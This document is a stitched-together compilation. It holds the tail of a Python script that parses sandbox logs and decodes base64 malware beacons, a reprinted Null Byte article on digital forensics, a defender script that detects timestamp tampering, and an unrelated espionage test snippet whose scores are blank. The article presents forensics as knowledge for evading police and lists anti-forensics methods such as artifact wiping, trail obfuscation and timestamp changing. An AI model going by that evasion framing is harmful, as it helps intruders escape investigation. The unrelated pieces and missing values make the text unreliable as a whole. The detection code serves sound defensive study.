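2017-06-04 13:18:40  HTTP connection, method: GET, URL: http://github.com/favicon.ico, file name: data/http/fakefiles/sample.html
2017-06-04 13:18:40  Last simulated date in log file
"""


@dataclass
class Event:
    timestamp: str
    service: str        # DNS, HTTP, HTTPS, SMTP, ...
    fields: dict        # e.g. {"method": "GET", "URL": "http://..."}


EVENT_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\s+(\w+) connection, (.+)$")


def parse_report(text: str) -> list[Event]:
    """Turn every '<timestamp> <service> connection, k: v, k: v' line into an Event."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue            # header lines and First/Last markers carry no connection
        fields = {}
        for part in m.group(3).split(", "):
            key, _, value = part.partition(": ")
            fields[key.strip()] = value.strip()
        events.append(Event(m.group(1), m.group(2), fields))
    return events


def decode_beacon_query(url: str) -> dict | None:
    """If the URL's whole query string is one base64 blob (no k=v pairs), decode it
    and split the plaintext into key/value pairs; otherwise return None."""
    query = urlsplit(url).query
    if not query or "=" in query.rstrip("="):     # '=' only as padding for base64
        return None
    try:
        raw = base64.b64decode(query, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    pairs = parse_qsl(raw, keep_blank_values=True)
    return dict(pairs) if pairs else None


def summarize(report_text: str) -> dict:
    """Collect DNS lookups and decoded beacons, keyed by contacted host."""
    events = parse_report(report_text)
    lookups = [e.fields["requested name"] for e in events
               if e.service == "DNS" and "requested name" in e.fields]
    beacons = []
    for e in events:
        url = e.fields.get("URL")
        if e.service in ("HTTP", "HTTPS") and url:
            decoded = decode_beacon_query(url)
            if decoded:
                beacons.append((urlsplit(url).hostname, decoded))
    return {"dns_lookups": lookups, "beacons": beacons}


if __name__ == "__main__":
    summary = summarize(SAMPLE_REPORT)
    print("DNS lookups:", ", ".join(summary["dns_lookups"]))
    for host, beacon in summary["beacons"]:
        print(f"beacon to {host}: version={beacon.get('version')} gate={beacon.get('gate')}")
```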
22. So many readers in the Null Byte community have been asking me questions about evading detection and hacking undetected that I decided to start a new series on digital forensics. I applaud each of you for your concern, as the last thing I want to see is one of you getting caught and spending years locked up in an 8 x 8 concrete room with a violent and lascivious cellmate. You can never be too cautious in this field of endeavor. The best way to evade detection is to understand what the other side is doing and using. So, this series will focus on the tools and techniques that law enforcement and security engineers are using to detect and prosecute hackers around the world.

What Is Digital Forensics?

Digital forensics is the field of determining who was responsible for a digital intrusion or other computer crime. It uses a wide range of techniques to gain attribution to the perpetrator. It relies upon the fundamental concept that whenever a digital intrusion or crime is committed, the perpetrator inadvertently leaves a bit of themselves behind for the investigator to find. These "bits" could be entries in log files, changes to the registry, hacking software, malware, remnants of deleted files, etc. All of these can provide clues and evidence to determine their identity and lead to the capture and arrest of the hacker. As a hacker, the more you know and understand about digital forensics, the better you can evade the standard forensic techniques and even implement anti-forensic measures to throw off the investigator.

The Digital Forensic Tools

Just like in hacking, there are a number of software tools for doing digital forensics. For the hacker, becoming familiar with these tools and how they work is crucial to evading them. Most digital forensic investigators rely upon three major commercial digital forensic suites.
Guidance Software's EnCase Forensic Access Data's Forensic Tool Kit (FTK) Prodiscover These three suites are comprised of multiple tools and reporting features and can be fairly expensive. While these suites are widely used by law enforcement, they use the same or similar techniques as the free open-source suites without the fancy interfaces. By using the open source and free suites, we can come to understand how such tools as EnCase work without the expense. EnCase is the most widely used tool by law enforcement, but not necessarily the most effective and sophisticated. These tools are designed for user-friendliness, efficiency, certification, good training, and reporting. There are a number of the free, open-source forensic suites, including the following three. The Sleuthkit Kit (TSK) Helix Knoppix We will look at each of these suites to better understand what digital forensic investigators can see and find about an intrusion and the perpetrator. The Forensic Tools Available in BackTrack In addition, there are a large number of individual tools that are available for digital forensics, some of which are available in our BackTrack and Kali distributions. Some of the better tools in BackTrack include the following, among many others. sleuthkit truecrypt hexedit autopsy iphoneanalyzer rifiuti2 ptk exiftool evtparse.pl fatback scalpel dc3dd driftnet timestomp What Can Digital Forensics Do? Digital forensics can do many things, all of which the aspiring hacker should be aware of. Below is a list of just some of the things. 
Recovering deleted files, including emails Determine what computer, device, and/or software created the malicious file, software, and/or attack Trail the source IP and/or MAC address of the attack Track the source of malware by its signature and components Determine the time, place, and device that took a picture Track the location of a cell phone enabled device (with or without GPS enabled) Determine the time a file was modified, accessed or created (MAC) Crack passwords on encrypted hard drives, files, or communication Determine which websites the perpetrator visited and what files he downloaded Determine what commands and software the suspect has utilized Extract critical information from volatile memory Determine who hacked the wireless network and who the unauthorized users are And that' just some of the things you can do with digital forensics! What Is Anti-Forensics? Anti-forensics are techniques that can be used to obfuscate information and evade the tools and techniques of the forensic investigator. Some of these techniques include the following. Hiding Data: Hiding data can include such things as encryption and stegonography. Artifact wiping: Every attack leaves a signature or artifact behind. Sometimes it's wise to attempt to wipe these artifacts from the victim machine so as to leave no tell-tale trail for the investigator. Trail Obfuscation: A decent forensic investigator can trail nearly any remote attack to a IP address and/or MAC address. Trail obfuscation is a technique that leads them to another source of the attack, rather than the actual attack. Change the timestamp: Change the file timestamp (modify, access, and change) to evade detection by forensic tools. 
Stay Tuned for More on Digital Forensics

We will spend some of our future Null Byte tutorials looking at the most widely-used techniques in digital forensics, using both commercial and open-source tools, and then advance to anti-forensics, or ways to evade detection from these tools and the forensic investigator. So, to learn the techniques law enforcement and security engineers are using to track hackers, along with how to avoid and evade, keep coming back here!

Source: https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-1-tools-techniques-0149732/

part x:
https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-2-network-forensics-0149958/
https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-3-recovering-deleted-files-0149868/
https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-4-evading-detection-while-dosing-0150445/
https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-5-windows-registry-forensics-0160561/
https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-6-using-ida-pro-0161643/
https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-7-windows-sysinternals-0162080/
https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-8-more-windows-registry-forensics-0162609/
https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-9-finding-storage-device-artifacts-registry-0164221/
https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-10-identifying-signatures-port-scan-dos-attack-0164805/
https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-11-using-splunk-0167012/
https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-12-windows-prefetch-files-0167643/
https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-13-browser-forensics-0168280/
https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-14-live-memory-forensics-0168337/
https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-15-parsing-out-key-info-from-memory-0169435/
https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-16-extracting-exif-data-from-image-files-0170128/
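A defender-side check that follows from the MAC timestamps and the "change the timestamp" technique in the article above, written here as an added example (not code from the Null Byte series or from timestomp): on Linux and macOS a process can set atime/mtime with utime() but cannot set ctime, so an mtime that lies after ctime, or far before it, deserves a second look. The sample tree it scans is constructed in a temporary directory; the thresholds are assumed defaults.

```python
"""Flag regular files whose mtime/ctime pair is inconsistent (added example,
not from the Null Byte article). utime() lets a process set atime/mtime, but
on Linux/macOS ctime is kernel-stamped with the current clock on every content
or metadata change and cannot be set from userspace. Hence:
  HIGH: mtime later than ctime    -> rare in normal use (clock skew, archive
        extraction aside), so review the file
  LOW:  mtime far older than ctime -> chmod/chown/rename also do this; hint only
Windows reports creation time in st_ctime, so the rules do not apply there."""
import os
import stat
import tempfile
import time

DAY = 86400.0

def find_timestamp_anomalies(root, tolerance=2.0, backdate_days=365):
    """Walk `root`; return [(path, severity)] for suspicious regular files."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue                        # vanished or unreadable
            if not stat.S_ISREG(st.st_mode):
                continue
            gap = st.st_mtime - st.st_ctime     # > 0 means mtime after ctime
            if gap > tolerance:
                hits.append((path, "HIGH"))
            elif -gap > backdate_days * DAY:
                hits.append((path, "LOW"))
    return hits

def build_demo_tree():
    """Constructed sample: an untouched file, one with mtime pushed 10 days
    ahead and one backdated 3 years (utime() only moves atime/mtime)."""
    root = tempfile.mkdtemp(prefix="mac_demo_")
    paths = {k: os.path.join(root, k) for k in ("normal", "future", "old")}
    for p in paths.values():
        with open(p, "w") as fh:
            fh.write("constructed sample\n")
    now = time.time()
    os.utime(paths["future"], (now + 10 * DAY,) * 2)
    os.utime(paths["old"], (now - 3 * 365 * DAY,) * 2)
    return root, paths

if __name__ == "__main__":
    for path, severity in sorted(find_timestamp_anomalies(build_demo_tree()[0])):
        print(severity, path)
```

The HIGH rule is the only one that stands on its own; a backdated mtime looks identical to an old file that was later chmod'ed, so the LOW hits need corroboration from another source (filesystem journal, logs) before they mean anything.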
23. On the "SITUATIONAL" test dated you obtained a score of out of 27, which places you above the average of applicants. On the "CULTURA GENERALA" test dated you obtained a score of out of 33, which places you above the average of applicants. Congratulations! Unless we are already colleagues, you will surely pass our aptitude tests. You have real qualities for espionage, think about it! @QuoVadis how much do you get per recruited agent?